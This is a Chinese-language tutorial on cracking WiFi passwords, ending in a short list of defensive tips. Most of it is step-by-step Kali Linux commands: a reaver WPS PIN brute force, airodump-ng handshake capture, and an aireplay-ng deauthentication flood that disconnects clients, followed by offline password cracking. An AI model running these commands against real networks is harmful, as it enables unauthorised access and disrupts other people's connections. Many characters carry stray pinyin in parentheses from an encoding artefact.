在網(wǎng)絡滲透中,能夠接入被攻擊者的網(wǎng)絡至關重要,只要黑客接入你的網(wǎng)絡,利用DNS欺騙,arp攻擊等各種釣魚技術(shù),基本上就能獲取一切信息,WIFI網(wǎng)絡的安全性重要性不言而喻!
手機上有很多類似360免費WIFI和WIFI萬能鑰匙的軟件,可以"破解"WIFI密碼,實際上這類軟件不是"破解"而是"偷"密碼,這類軟件在安裝的時候會自動上傳你家的WIFI密碼,也有可能是你一不小心分享出去的!分享之后別人使用軟件就能連上你家的WIFI了,一般來說,商家WIFI比較多.
常見的WIFI破解技術(shù)有2種:
攻擊測試環(huán)境:kali linux 64位,可以安裝雙系統(tǒng),如果用虛擬機的話必須要用外置USB網(wǎng)卡!
1.PIN
該技術(shù)主要利用路由器的wps功能的bug,PIN 碼分前4 和后4,先破前4 只有最多一萬個組合,破后4 中的前3 只有一千個組合,一共就是一萬一千個密碼組合。 10 的4 次方+10 的3 次方=11000 個密碼組合。當reaver 確定前4 位PIN 密碼后,其任務進度數(shù)值將直接跳躍至90.9%以上,也就是說只剩余一千個密碼組合了。總共一萬一千個密碼!
主要攻擊工具:reaver,該工具十分強大,有很多配置參數(shù),這里只列出最簡單的攻擊步驟,僅供參考:
1.airmon-ng start wlan0 #啟動網(wǎng)卡的監(jiān)聽模式
2.airodump-ng wlan0mon #查看周圍區(qū)域所有WIFI信號情況
3.reaver -i wlan0mon -b AP_MAC -vv #開始pin
4.reaver -i wlan0mon -b AP_Mac -p WPS_PIN #得到pin值獲取密碼
備注:其實現(xiàn)在很多路由器都關閉了wps功能,所以沒法pin,而且很多新的路由器都是防pin!
2.暴力窮盡破解
該技術(shù)理論上只要計算機計算能力夠強大,沒有什么密碼破解不了!只是時間長短的問題.先抓握手包然后跑包!
主要工具:aircrack-ng
1.airmon-ng check kill #kill一些無關進程
2.airmon-ng start wlan0 #開啟網(wǎng)卡監(jiān)聽模式
3.airodump-ng wlan0mon #查看周圍區(qū)域所有WIFI信號情況
4.airodump-ng -c 信道 --bssid 目標mac -w wep wlan0mon #開始抓包
5.airodump-ng -c 信道 --bssid 目標mac wlan0mon #查看當前環(huán)境的WiFi連接情況
6.aireplay-ng --deauth 10000 -a 目標mac -c 客戶端mac wlan0mon #對連接到目標ap的客戶端攻擊,使其掉線,抓取握手包!
備注:抓包的關鍵是第6步抓取握手包,所謂握手包就是對方設備掉線后重新連接WIFI時候的數(shù)據(jù)包,只要抓到握手包就可以了,拿到握手包后切換到windows系統(tǒng),用EWSA等跑包軟件跑包,跑包速度看機器配置,主要是看顯卡配置,本人筆記本i7+gt750M,一秒鐘2萬次,其實也看運氣,如果是弱密碼,分分鐘鐘的事情,如果是包含字母\標點符號\特殊符號的密碼......那幾乎不可能!
3.防備措施:
1.不要安裝 xxx免費WIFI等軟件,如果不小心把密碼分享出去的話,只能改密碼了!
2.關閉路由器wps功能.此功能大部分人都用不到
3.隱藏ssid.這樣別人就搜不到你家的WIFI信號
4.使用復雜密碼,包含字母\標點符號\特殊符號!